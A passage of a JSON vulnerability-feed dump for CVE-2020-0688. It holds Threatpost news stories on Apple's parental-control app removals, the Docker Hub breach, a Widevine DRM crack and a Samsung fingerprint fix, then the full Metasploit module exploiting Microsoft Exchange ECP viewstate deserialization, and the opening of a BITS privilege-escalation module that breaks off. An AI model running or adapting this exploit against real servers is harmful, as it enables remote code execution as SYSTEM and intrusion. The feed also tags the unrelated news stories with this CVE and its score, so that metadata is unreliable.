most downloaded parental-control apps, as well as restricting lesser-known apps. That includes forcing apps to remove features that enable parents to control children\u2019s devices, or restrict access to adult content.\n\nThe move comes after Apple launched its own screen control app, Screen Time, a feature built into iOS 12 that enables users to set screen time and limits on their own phones.\n\nThe complaint from Kidslox and Qustodio that was filed with the European Commission\u2019s competition office was filed in tandem with the report, saying that the removal and restriction of parental-control apps was an anti-competitive practice by nature.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/29144205/screen-time-1-.png>)\n\nParental Control Apps\n\nKidslox alleges that Apple has required it to make changes to its app that ultimately harmed it competitive factor.\n\n\u201cTo create Screen Time, Apple took the best pieces and best practices from existing parental-control and well-being apps in the App Store, bringing no tangible innovations to market,\u201d Kidslox CEO Viktor Yevpak said in a statement provided to Threatpost. \u201cStanding up to Apple is about even more than fair competition.\u201d\n\nMeanwhile Qustodio, in a statement showed to Threatpost regarding the EU complaint, said that Apple has arbitrarily blocked several parental-control apps in the market from making app updates, while completely removing others.\n\n\u201cWith the introduction of Apple\u2019s Screen Time, developers in the parental control category experienced unprecedented anti-competitive behavior from Apple,\u201d Qustodio CEO Eduardo Cruz said in the statement. \u201cThe company acts as both a marketplace and a gatekeeper and uses its dominant position to create exclusive competitive advantage for its own service.\u201d\n\nOther screen-time apps began complaining about being removed from the Apple Store all the way back in the fall of 2018, including Mute, a screen-time tracking app.\n\nNick Kuh, creator of Mute, [complained](<https://medium.com/@nick.kuh/mute-app-startup-to-shutdown-a1db01440c56>) in October 2018 that Apple had removed his app from the App Store (Apple later returned his app after his post gained media attention).\n\n\u201cIt appears that Apple are now shutting down many (all?) screen-time tracking apps now that they\u2019ve added screen-time tracking into iOS 12,\u201d he said in his post. \u201cIt turns out that Apple have sent a similar email to many other app developers of screen-time tracking and parental-control apps. I believe that Mute is one of the first to go, but expect others to disappear from the App Store in the coming weeks as their notice period expires.\u201d\n\n## Apple Hits Back** **\n\nIn response to reports of developer outrage, Apple said in a statement: \u201cApple has always supported third-party apps on the App Store that help parents manage their kids\u2019 devices. Contrary to what the _New York Times_ reported over the weekend, this isn\u2019t a matter of competition. It\u2019s a matter of security.\u201d\n\nApple said several of the apps removed use the MDM format, which is typically used by enterprises to give companies control over their employees\u2019 devices. However, when non-enterprise developers use the feature on their apps, the technology can have dangerous privacy and security implications, Apple said.\n\nThese MDM functions give apps a \u201cconfiguration profile\u201d which is generally used for enterprises \u2013 and allow users to configure or track certain settings \u2013 including app settings, Wi-Fi and permissions. In other words, app developers behind the apps gain access to all data \u2013 such as location, activity and more \u2013 of the children whose phones are being controlled.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/29144327/screen-time-2.png>)\n\nApple Screen Time\n\nApple did not respond to multiple requests for comment from Threatpost.\n\nThe company in its statement said that it began noticing that non-enterprise developers were using MDM back in early 2017, and updated their guidelines based on that work in mid-2017.\n\n\u201cWhen we found out about these guideline violations, we communicated these violations to the app developers, giving them 30 days to submit an updated app to avoid availability interruption in the App Store,\u201d Apple said. \u201cSeveral developers released updates to bring their apps in line with these policies. Those that didn\u2019t were removed from the App Store.\u201d\n\nHowever, app developers argue that MDM is not used maliciously and that parents setting up the apps are given fair notice about the MDM features when downloading the app.\n\nSuren Ramasubbu, CEO of one of the parental control apps impacted by Apple\u2019s crackdown, Mobicip, said that when parental control apps using MDM is installed, it is the parent that goes through the process of setting up \u2013 and they are explicitly asked to agree to the terms and conditions and privacy policy before installing the MDM profile and certificate.\n\n\u201cPlease note that the parent has explicitly agreed to enroll the device in a third-party MDM system,\u201d he said in a [post](<https://medium.com/@suren_60419/apples-case-for-removing-screentime-apps-seven-questions-for-phil-schiller-33cf78b01713>) over the weekend. \u201cDo these parents understand the risks? May be. May be not. But should it be the parent who decides the risk vs. reward? Given that Apple Screen Time requires both parents and children to be on Apple devices, and given that most families today have a blend of devices with the parents on Android, isn\u2019t it anti-competitive to not give parents this choice?\u201d\n\nApps like Kidslox and Qustodio continue to maintain that Apple\u2019s practices are unfair \u2013 and ultimately hurting both app developers and consumers.\n\n\u201cQustodio and Kidslox are asking Apple to stop this unprecedented hostile behavior, compete fairly, and open up exclusive API\u2019s and technologies introduced in their own Screen Time service,\u201d according to Qustodio.\n\nIt\u2019s not the first time Apple has come under fire for anti-competition app store practices \u2013 in March, [Spotify filed a complaint](<https://newsroom.spotify.com/2019-03-13/consumers-and-innovators-win-on-a-level-playing-field/>) against the iPhone maker saying that newly-introduced App Store rules \u2013 such as a 30 percent tax imposed on purchases made via Apple\u2019s payment system \u2013 stifle competing music services that are being sold on its platform.\n", "modified": "2019-04-29T19:26:31", "published": "2019-04-29T19:26:31", "id": "THREATPOST:22663CEB225A1F7F9DD4EBD8B84956C1", "href": "https://threatpost.com/apple-parental-control-app-removal/144181/", "type": "threatpost", "title": "Apple Defends Parental Control App Removal Amid Backlash", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:52:03", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688"], "description": "UPDATE\n\nDocker Hub has confirmed that it was hacked last week; with sensitive data from approximately 190,000 accounts potentially exposed.\n\n\u201cOn Thursday, April 25th, 2019, we discovered unauthorized access to a single Hub database storing a subset of non-financial user data,\u201d Kent Lamb, director of Docker Support, said in an email over the weekend, which a Docker user [posted on online](<https://news.ycombinator.com/item?id=19763413>). \u201cUpon discovery, we acted quickly to intervene and secure the site.\u201d\n\nThe container specialist noted that it was a \u201cbrief period\u201d of unauthorized access that impacted less than 5 percent of Hub users; however, the data includes usernames and hashed passwords, as well as Github and Bitbucket tokens for Docker autobuilds.\n\n[](<https://threatpost.com/newsletter-sign/>) \nDocker has revoked GitHub tokens and access keys for affected accounts, and the company warned that this may affect ongoing builds from its automated build service; users \u201cmay need to [unlink and then relink](<https://docs.docker.com/docker-hub/builds/link-source/>) your GitHub and BitBucket source provider,\u201d Lamb warned.\n\nTorsten George, cybersecurity evangelist at Centrify, told Threatpost that \u201cWhen you dig deeper into the details of the breach, you\u2019ll see that it\u2019s not about the numbers, but the reach. The big issue about this breach is the fact that the database included tokens from other much-used developer resources, including GitHub and Bitbucket. This breach stresses the importance of application-to-application password management (AAPM) and temporary credentials rather than permanent ones.\u201d\n\n## Ramifications and What to Do\n\nCleanup from the incident could be significant endeavor, according to researchers.\n\n\u201cAs a result of this breach, it\u2019s possible that images in your Docker Hub repository may have been tampered with or overwritten,\u201d Wei Lien Dang, vice president of product at StackRox, told Threatpost. \u201cAttacks on the build pipeline can have serious downstream effects on what is currently running inside your infrastructure. Tainted images can be difficult to detect, and the containers launched from them may even run as expected, except with a malicious process in the background. If you use Docker Hub with Kubernetes environments, you\u2019ll also need to roll your ImagePullSecrets.\u201d\n\nEven though the passwords were hashed, Docker Hub users should change their passwords on Docker Hub and any other accounts that share that password. Users can also [view security actions](<https://help.github.com/en/articles/reviewing-your-security-log%20and%20https:/bitbucket.org/blog/new-audit-logs-give-you-the-who-what-when-and-where>) on GitHub and BitBucket accounts to check for unauthorized access.\n\n\u201cUnexpected changes in images will have an effect on application behavior, making runtime detection and application baselining critical,\u201d Dang said. \u201cCharacterizing the behaviors of individual Kubernetes deployments will highlight deviations in network connectivity, file access and process executions. These deviations are all indicators that malicious activity is taking place within a container. You need the ability to quickly inspect runtime activity within your containers to verify they are running only expected processes.\u201d\n\nAlso, because Docker didn\u2019t provide a specific timeline for this breach, no one knows how long ago the unauthorized access occurred. \u201cAs with most breaches, the perpetrators may have had access to compromised resources significantly longer than just last week,\u201d Dang said. \u201cTo be safe, you should verify recently pushed images going back over the past several weeks. Doing this audit can be difficult, as not every registry will let you filter the data by image age.\u201d\n\n## Docker: An Escalating Target?\n\nDocker has been in the security headlines before in the recent past; for instance, in January, researchers [hacked the Docker test platform](<https://threatpost.com/hack-allows-escape-of-play-with-docker-containers/140831/>) called Play-with-Docker with a proof-of-concept hack, allowing them to access data and manipulate any test Docker containers running on the host system. The team was able to escape the container and run code remotely right on the host.\n\nAlso, last year 17 malicious docker images [were found available](<https://threatpost.com/malicious-docker-containers-earn-crypto-miners-90000/132816/>) on Docker Hub that allowed hackers to earn $90,000 in cryptojacking profits.\n\nAnd Docker [in 2017 patched](<https://threatpost.com/docker-patches-container-escape-vulnerability/123161/>) a privilege escalation vulnerability that could also have lead to container escapes, allowing a hacker to affect operations of a host from inside a container.\n\nContainers are increasing in popularity among DevOps users in companies of all sizes because they facilitate collaboration, which optimizes their ability to deliver code fast to virtual environments. However, Lacework in [an analysis in 2018](<https://threatpost.com/22k-open-vulnerable-containers-found-exposed-on-the-net/132898/>) noted that securing workloads in public clouds requires a different approach than that used for traditional data centers, where APIs drive the infrastructure and create short-lived workloads. In turn, they\u2019re also becoming more interesting to cybercriminals, Dan Hubbard, chief security architect at Lacework, told Threatpost.\n\nEnterprises also report an accelerating number of container attacks. In fact, 60 percent of respondents in [a recent survey](<https://threatpost.com/threatlist-container-security/140614/>) acknowledged that their organizations had been hit with at least one container security incident within the past year. In companies with more than 100 containers in place, that percentage rises to 75 percent.\n\n_This story was updated on April 30 to add insight into potential repercussions of the incident. _\n", "modified": "2019-04-29T14:13:23", "published": "2019-04-29T14:13:23", "id": "THREATPOST:B047BB0FECBD43E30365375959B09B04", "href": "https://threatpost.com/docker-hub-hack/144176/", "type": "threatpost", "title": "Docker Hub Hack Affects 190K Accounts, with Concerning Consequences", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:51:54", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688"], "description": "Researchers have used a proof-of-concept (PoC) side-channel attack to download an unencrypted raw file for Netflix\u2019 Stranger Things, in a format that\u2019s ready to distribute out to any buyer on the internet.\n\nThis pirate\u2019s booty is the result of breaking open the widely deployed digital rights management (DRM) to framework known as Widevine, the DRM engine behind Netflix, Hulu and Amazon Prime, among others.\n\nBy way of background, Widevine is an encryption method developed by Google but offered royalty-free to content creators and streaming services. According to Google stats, about 5 billion devices out there support it, and 82 billion content licenses are issued quarterly. In other words, it\u2019s a Big Kahuna when it comes to anti-piracy approaches \u2013 rivaled only by Apple\u2019s FairPlay and Microsoft\u2019s PlayReady DRM schemes.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nWidevine\u2019s end-to-end approach to encrypting copyrighted content and [preventing piracy](<https://threatpost.com/kodi_box_malware/144191/>) is actually quite secure, according to researchers at Fidus Information Security, who developed the PoC. But a vulnerability exists in Level 3 of the framework that opens the door to side-channel attacks.\n\n## The Widevine Approach\n\nTo keep pirates from streaming or downloading content that they shouldn\u2019t (both for personal or resale purposes), Widevine uses a combination of hardware security and an isolated secure operating system (OS).\n\nAs it explains in its [documentation](<https://www.widevine.com/>), Widevine offers three levels of content protection: 1, 2 and 3. Level 1 is the most secure, where all content processing and cryptography operations are handled inside a Trusted Execution Environment (TEE); and, Widevine is incorporated into a display via a secured path like HDCP. This is the case with most modern Android devices.\n\nIn Level 2, Widevine is used within a TEE to decrypt a stream, which is then sent to the display in an unprotected format.\n\nAnd in Level 3, which Fidus researchers were able to crack, Widevine is used to decrypt streams using the device\u2019s CPU rather than inside the secure TEE, after which the decrypted stream is sent to the display unprotected. The Chrome and Firefox browsers use Level 3, for instance.\n\nThe capabilities of the user\u2019s playback device and the quality of the content determines which level of protection is applied. Level 3 is used mainly for non-HD streams, 720p and below, and low-resolution audio \u2013 content that would be delivered over spotty broadband to a desktop or laptop (which is why browsers support Level 3) or to less sophisticated, low-cost, non-HD devices that lack TEEs, which are [actually found in volume](<https://www.androidauthority.com/oneplus-5t-review-814075/>) in many areas of the world, like China. Some mobile devices also [block HD streams](<https://www.digit.in/features/mobile-phones/poco-f1-is-not-the-only-smartphone-to-block-hd-streaming-no-xiaomi-device-can-stream-netflix-in-hd-43339.html>) because of wireless carrier restrictions.\n\nIn all cases, \u201cthrough the design of the Widevine framework, the keys that have been used to encrypt the content are never actually exposed directly to the user,\u201d explained the firm, in a [Monday posting](<https://fidusinfosec.com/breaking-content-protection-on-streaming-websites/>) on the PoC. \u201cInstead, the header file that gets sent to the client when a stream is started contains the bare minimum information needed, containing just some metadata about the encryption scheme used.\u201d\n\nThat metadata then gets passed to the content decryption module (CDM), which is contained in the client or browser that the user has installed. The CDM handles getting the license keys from the Widevine license server, before the content is decrypted and displayed, using Arxan to obfuscate the communication with the server. The license server then sends back a license to the client, which contains the content keys. These content keys are then used by the CDM to decrypt the content, which the user can then view.\n\nHowever, using a new variant of a piracy method [uncovered by researcher David Buchanan](<https://twitter.com/David3141593/status/1080606827384131590>) in January, the Fidus researchers were able to board the Netflix ship, as it were, and plunder its premium content by plucking the keys out of this process.\n\n## Breaking Widevine L3\n\n\u201cIt was possible to download a raw file of Stranger Things from Netflix and fully remove the content protection enabled; allowing for illegal distribution of the material,\u201d Fidus researchers noted.\n\nIt should be noted that the issue lies with Widevine, and that Netflix is just one of many Widevine users susceptible to such an attack, the researchers said.\n\nFidus team said that they won\u2019t be publishing the PoC code or further details given that the repercussions could be significant. In January, Buchanan was similarly cagey about his own Widevine-cracking, but did say that it was \u201cscarily trivial to pull off,\u201d and that he used the [Side-Channel Marvels](<https://github.com/SideChannelMarvels>) project during \u201ca few evenings of work\u201d to do so.\n\n\u201cTheir Whitebox AES-128 implementation is vulnerable to the well-studied DFA attack, which can be used to recover the original key. Then you can decrypt the MPEG-CENC streams with plain old ffmpeg,\u201d he tweeted at the time, referring to differential fault analysis (DFA), more on which [can be found here](<https://blog.quarkslab.com/differential-fault-analysis-on-white-box-aes-implementations.html>).\n\nHe also said that while Google acknowledged the issue, there\u2019s not much to be done:\n\n> DRM is flawed by design. I do not consider this a bug, and it cannot be fixed.\n> \n> \u2014 D\u0430v\u0456d \u0412uc\u04bb\u0430n\u0430n (@David3141593) [January 3, 2019](<https://twitter.com/David3141593/status/1080618940689252352?ref_src=twsrc%5Etfw>)\n\nFidus intimated that it was working on breaking Widevine L1 and L2 \u2013 which \u201cWith Level 3 down, there\u2019s two to go.\u201d These, if cracked, would be a much bigger problem for Widevine and those that rely upon it, opening the door to pirating the higher-value HD content.\n\nThreatpost has reached out to Fidus for more details and will update this post for any new information.\n\nGoogle did not immediately return a request for comment.\n\n** **\n", "modified": "2019-04-30T16:28:34", "published": "2019-04-30T16:28:34", "id": "THREATPOST:4C22D22EF8F65F5DA108A15C99CB9F55", "href": "https://threatpost.com/netflix-compromised-widevine-drm-hack/144220/", "type": "threatpost", "title": "Researchers Compromise Netflix Content in Widevine DRM Hack", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-09-30T22:23:40", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688"], "description": "Samsung has reportedly started rolling out a software patch for the Galaxy S10 and Note10, addressing glitches in both phone models that allow the bypass of their built-in fingerprint authentication sensors.\n\nThe fix comes after Samsung admitted last week that anyone [can bypass the Galaxy S10 fingerprint sensor](<https://threatpost.com/galaxy-s10-fingerprint-sensor-thwarted-with-screen-protector-report/149197/>) if a third-party silicon case is enclosing the phone. The acknowledgement led to widespread backlash from customers, while several U.K.-based banks have also started blacklisting impacted Samsung devices for their apps, as the issue also allowed users to access various apps on the impacted devices that were using the biometric function for authentication.\n\nAccording to a Wednesday [report by Android Police](<https://www.androidpolice.com/2019/10/23/samsung-will-begin-patching-fingerprint-scanner-security-flaw-within-24-hours/>), Samsung is now rolling out patches to customers, urging its customers support app (Samsung Members) to update their phones to the latest software version, which will fix the biometric authentication glitch.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cSamsung is releasing a software patch to fix fingerprint issues on Galaxy Note10, Note10+, S10, S10+, and S10 5G devices,\u201d Samsung said on a [note on Samsung Members](<https://www.androidpolice.com/2019/10/23/samsung-will-begin-patching-fingerprint-scanner-security-flaw-within-24-hours/#ap-lightbox>). \u201cIf you have registered a fingerprint on one of these devices, you will receive a notification with instructions. This update is being sent out gradually, so you may not receive the notification immediately.\u201d\n\nSamsung Galaxy S10 and Note10 users, for their part, are urged to look out for an update notification on their devices called \u201cBiometrics Update.\u201d Once they click on \u201cUpdate,\u201d they will be instructed to delete all previously registered fingerprints from their phone with covers on the phone, and re-register them without a cover applied to the phone.\n\nThe issue first came to light after a woman alleged that a $3 smartphone screen protector allowed unauthorized users to dupe her Samsung Galaxy S10\u2019s fingerprint recognition sensor \u2013 giving access to her phone and banking apps. The U.K. woman, Lisa Neilson, told media reports earlier in October that only her fingerprint was registered on her new Galaxy S10. However, after buying a third-party screen protector off eBay, Neilson\u2019s husband was able to unlock her phone using his fingerprint \u2013 even though it wasn\u2019t registered on the device. Worse, the pair found that Neilson\u2019s husband could log into her phone and access various private apps using the fingerprint biometrics security feature.\n\n\u201cThis issue involved ultrasonic fingerprint sensors unlocking devices after recognizing 3-dimensional patterns appearing on certain silicone screen protecting cases as users\u2019 fingerprints,\u201d said Samsung in a [press release last week](<https://news.samsung.com/global/statement-on-fingerprint-recognition-issue>). \u201cTo prevent any further issues, we advise that Galaxy Note10/10+ and S10/S10+/S10 5G users who use such covers to remove the cover, delete all previous fingerprints and newly register their fingerprints.\u201d\n\nOn the heels of this report, several videos popped up of Galaxy S10 users trying the trick out successfully on their own phones (one such video is below).\n\n[NatWest](<https://twitter.com/NatWest_Help/status/1186676299743580161>) and [Royal Bank](<https://twitter.com/RBS_Help/status/1186553506251071493>) are among the banks that removed their apps from the Google Play store for customers with Samsung Galaxy S10 and Note 10 devices: \u201cThis is due to reports that there are security concerns regarding these devices,\u201d according to a Royal Bank tweet. \u201cWe hope to have our app available again shortly once the issue has been resolved.\u201d\n\n> Hi there Martyn. We've removed the app from the Play Store for customers with Samsung S10 devices. This is due to reports that there are security concerns regarding these devices. We hope to have our app available again shortly once the issue has been resolved. WL\n> \n> \u2014 Royal Bank (@RBS_Help) [October 22, 2019](<https://twitter.com/RBS_Help/status/1186553506251071493?ref_src=twsrc%5Etfw>)\n\nThe utilization of biometrics on smartphones has been helpful for identity authentication \u2013 but it\u2019s not foolproof.\n\nIn fact, also in October Google [came under fire for its Pixel 4](<https://arstechnica.com/gadgets/2019/10/google-says-a-fix-for-pixel-4-face-unlock-is-months-away/>) facial recognition unlock feature, which users said would unlock for users even if their eyes were closed. Google issued a media statement this weekend that the glitch will be fixed in a software update that will be delivered in the \u201ccoming months.\u201d\n\nOther privacy incidents have plagued smartphone vendors around biometric authentication. [In August](<https://threatpost.com/researchers-bypass-apple-faceid-using-biometrics-achilles-heel/147109/>), researchers revealed vulnerabilities in the authentication process of biometrics technology that could allow bad actors to bypass various facial recognition applications \u2013 including Apple\u2019s FaceID. In 2018, a design flaw affecting all in-display fingerprint sensors \u2013 that left over a half-dozen cellphone models vulnerable to a trivial lock-screen bypass attack \u2013 [was quietly patched](<https://threatpost.com/lock-screen-bypass-bug-quietly-patched-in-handsets/139141/>). The flaw was tied to a bug in the popular in-display fingerprint reader technology used for user authentication. New vulnerabilities in [voice authentication](<https://threatpost.com/black-hat-2018-voice-authentication-is-broken-researchers-say/134926/>) have been uncovered as well.\n", "modified": "2019-10-24T15:44:50", "published": "2019-10-24T15:44:50", "id": "THREATPOST:99AD02BEC4B8423B8E050E0A4E9C4DEB", "href": "https://threatpost.com/samsung-fix-galaxy-s10-fingerprint-sensor/149510/", "type": "threatpost", "title": "Samsung Rolls Out Fix For Galaxy S10 Fingerprint Sensor Glitch", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2020-03-05T07:12:27", "description": "", "published": "2020-03-04T00:00:00", "type": "packetstorm", "title": "Exchange Control Panel Viewstate Deserialization", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-0688"], "modified": "2020-03-04T00:00:00", "id": "PACKETSTORM:156620", "href": "https://packetstormsecurity.com/files/156620/Exchange-Control-Panel-Viewstate-Deserialization.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'bindata' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \n# include Msf::Auxiliary::Report \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \nDEFAULT_VIEWSTATE_GENERATOR = 'B97B4E27' \nVALIDATION_KEY = \"\\xcb\\x27\\x21\\xab\\xda\\xf8\\xe9\\xdc\\x51\\x6d\\x62\\x1d\\x8b\\x8b\\xf1\\x3a\\x2c\\x9e\\x86\\x89\\xa2\\x53\\x03\\xbf\" \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Exchange Control Panel Viewstate Deserialization', \n'Description' => %q{ \nThis module exploits a .NET serialization vulnerability in the \nExchange Control Panel (ECP) web page. The vulnerability is due to \nMicrosoft Exchange Server not randomizing the keys on a \nper-installation basis resulting in them using the same validationKey \nand decryptionKey values. With knowledge of these, values an attacker \ncan craft a special viewstate to cause an OS command to be executed \nby NT_AUTHORITY\\SYSTEM using .NET deserialization. \n}, \n'Author' => 'Spencer McIntyre', \n'License' => MSF_LICENSE, \n'References' => [ \n['CVE', '2020-0688'], \n['URL', 'https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys'], \n], \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows (x86)', { 'Arch' => ARCH_X86 } ], \n[ 'Windows (x64)', { 'Arch' => ARCH_X64 } ], \n[ 'Windows (cmd)', { 'Arch' => ARCH_CMD, 'Space' => 450 } ] \n], \n'DefaultOptions' => \n{ \n'SSL' => true \n}, \n'DefaultTarget' => 1, \n'DisclosureDate' => '2020-02-11', \n'Notes' => \n{ \n'Stability' => [ CRASH_SAFE, ], \n'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ], \n'Reliability' => [ REPEATABLE_SESSION, ], \n} \n)) \n \nregister_options([ \nOpt::RPORT(443), \nOptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]), \nOptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]), \nOptString.new('PASSWORD', [ true, 'The password to authenticate with' ]) \n]) \n \nregister_advanced_options([ \nOptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]), \n]) \nend \n \ndef check \nstate = get_request_setup \nviewstate = state[:viewstate] \nreturn CheckCode::Unknown if viewstate.nil? \n \nviewstate = Rex::Text.decode_base64(viewstate) \nbody = viewstate[0...-20] \nsignature = viewstate[-20..-1] \n \nunless generate_viewstate_signature(state[:viewstate_generator], state[:session_id], body) == signature \nreturn CheckCode::Safe \nend \n \n# we've validated the signature matches based on the data we have and thus \n# proven that we are capable of signing a viewstate ourselves \nCheckCode::Vulnerable \nend \n \ndef generate_viewstate(generator, session_id, cmd) \nviewstate = ::Msf::Util::DotNetDeserialization.generate(cmd) \nsignature = generate_viewstate_signature(generator, session_id, viewstate) \nRex::Text.encode_base64(viewstate + signature) \nend \n \ndef generate_viewstate_signature(generator, session_id, viewstate) \nmac_key_bytes = Rex::Text.hex_to_raw(generator).unpack('I<').pack('I>') \nmac_key_bytes << Rex::Text.to_unicode(session_id) \nOpenSSL::HMAC.digest(OpenSSL::Digest.new('sha1'), VALIDATION_KEY, viewstate + mac_key_bytes) \nend \n \ndef exploit \nstate = get_request_setup \n \n# the major limit is the max length of a GET request, the command will be \n# XML escaped and then base64 encoded which both increase the size \nif target.arch.first == ARCH_CMD \nexecute_command(payload.encoded, opts={state: state}) \nelse \ncmd_target = targets.select { |target| target.arch.include? ARCH_CMD }.first \nexecute_cmdstager({linemax: cmd_target.opts['Space'], delay: datastore['CMDSTAGER::DELAY'], state: state}) \nend \nend \n \ndef execute_command(cmd, opts) \nstate = opts[:state] \nviewstate = generate_viewstate(state[:viewstate_generator], state[:session_id], cmd) \n5.times do |iteration| \n# this request *must* be a GET request, can't use POST to use a larger viewstate \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'ecp', 'default.aspx'), \n'cookie' => state[:cookies].join(''), \n'agent' => state[:user_agent], \n'vars_get' => { \n'__VIEWSTATE' => viewstate, \n'__VIEWSTATEGENERATOR' => state[:viewstate_generator] \n} \n}) \nbreak \nrescue Rex::ConnectionError, Errno::ECONNRESET => e \nvprint_warning('Encountered a connection error while sending the command, sleeping before retrying') \nsleep iteration \nend \nend \n \ndef get_request_setup \n# need to use a newer default user-agent than what Metasploit currently provides \n# see: https://docs.microsoft.com/en-us/microsoft-edge/web-platform/user-agent-string \nuser_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.36 Edg/79.0.309.43' \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'owa', 'auth.owa'), \n'method' => 'POST', \n'agent' => user_agent, \n'vars_post' => { \n'password' => datastore['PASSWORD'], \n'flags' => '4', \n'destination' => full_uri(normalize_uri(target_uri.path, 'owa')), \n'username' => datastore['USERNAME'] \n} \n}) \nfail_with(Failure::Unreachable, 'The initial HTTP request to the server failed') if res.nil? \ncookies = [res.get_cookies] \n \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'ecp', 'default.aspx'), \n'cookie' => res.get_cookies, \n'agent' => user_agent \n}) \nfail_with(Failure::UnexpectedReply, 'Failed to get the __VIEWSTATEGENERATOR page') unless res && res.code == 200 \ncookies << res.get_cookies \n \nviewstate_generator = res.body.scan(/id=\"__VIEWSTATEGENERATOR\"\\s+value=\"([a-fA-F0-9]{8})\"/).flatten[0] \nif viewstate_generator.nil? \nprint_warning(\"Failed to find the __VIEWSTATEGENERATOR, using the default value: #{DEFAULT_VIEWSTATE_GENERATOR}\") \nviewstate_generator = DEFAULT_VIEWSTATE_GENERATOR \nelse \nvprint_status(\"Recovered the __VIEWSTATEGENERATOR: #{viewstate_generator}\") \nend \n \nviewstate = res.body.scan(/id=\"__VIEWSTATE\"\\s+value=\"([a-zA-Z0-9\\+\\/]+={0,2})\"/).flatten[0] \nif viewstate.nil? \nvprint_warning('Failed to find the __VIEWSTATE value') \nend \n \nsession_id = res.get_cookies.scan(/ASP\\.NET_SessionId=([\\w\\-]+);/).flatten[0] \nif session_id.nil? \nfail_with(Failure::UnexpectedReply, 'Failed to get the ASP.NET_SessionId from the response cookies') \nend \nvprint_status(\"Recovered the ASP.NET_SessionID: #{session_id}\") \n \n{user_agent: user_agent, cookies: cookies, viewstate: viewstate, viewstate_generator: viewstate_generator, session_id: session_id} \nend \nend \n`\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/156620/exchange_ecp_viewstate.rb.txt"}, {"lastseen": "2020-06-12T01:33:20", "description": "", "published": "2020-06-11T00:00:00", "type": "packetstorm", "title": "Background Intelligent Transfer Service Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-0688", "CVE-2020-0787"], "modified": "2020-06-11T00:00:00", "id": "PACKETSTORM:158056", "href": "https://packetstormsecurity.com/files/158056/Background-Intelligent-Transfer-Service-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \ninclude Msf::Post::Windows::Priv \ninclude Msf::Exploit::EXE # Needed for generate_payload_dll \ninclude Msf::Post::Windows::FileSystem \ninclude Msf::Post::Windows::ReflectiveDLLInjection \ninclude Msf::Exploit::FileDropper \ninclude Msf::Post::File \ninclude Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability', \n'Description' => %q{ \nThis module exploits CVE-2020-0787, an arbitrary file move vulnerability in outdated versions of the \nBackground Intelligent Transfer Service (BITS), to overwrite C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll \nwith a malicious DLL containing the attacker's payload. \n \nTo achieve code execution as the SYSTEM user, the Update Session Orchestrator service is then started, which \nwill result in the malicious WindowsCoreDeviceInfo.dll being run with SYSTEM privileges due to a DLL hijacking \nissue within the Update Session Orchestrator Service. \n \nNote that presently this module only works on Windows 10 and Windows Server 2016 and later as the \nUpdate Session Orchestrator Service was only introduced in Windows 10. Note that only Windows 10 has been tested, \nso your mileage may vary on Windows Server 2016 and later. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'itm4n', # PoC \n'gwillcox-r7' # msf module \n], \n'Platform' => ['win'], \n'SessionTypes' => ['meterpreter'], \n'Privileged' => true, \n'Arch' => [ARCH_X86, ARCH_X64], \n'Targets' => \n[ \n[ 'Windows DLL Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => '2020-03-10', \n'References' => \n[ \n['CVE', '2020-0787'], \n['URL', 'https://itm4n.github.io/cve-2020-0787-windows-bits-eop/'], \n['URL', 'https://github.com/itm4n/BitsArbitraryFileMove'], \n['URL', 'https://attackerkb.com/assessments/e61cfec0-d766-4e7e-89f7-5aad2460afb8'], \n['URL', 'https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html'], \n['URL', 'https://itm4n.github.io/usodllloader-part1/'], \n['URL', 'https://itm4n.github.io/usodllloader-part2/'], \n], \n'Notes' => \n{ \n'SideEffects' => [ ARTIFACTS_ON_DISK ], \n'Reliability' => [ REPEATABLE_SESSION ], \n'Stability' => [ CRASH_SAFE ] 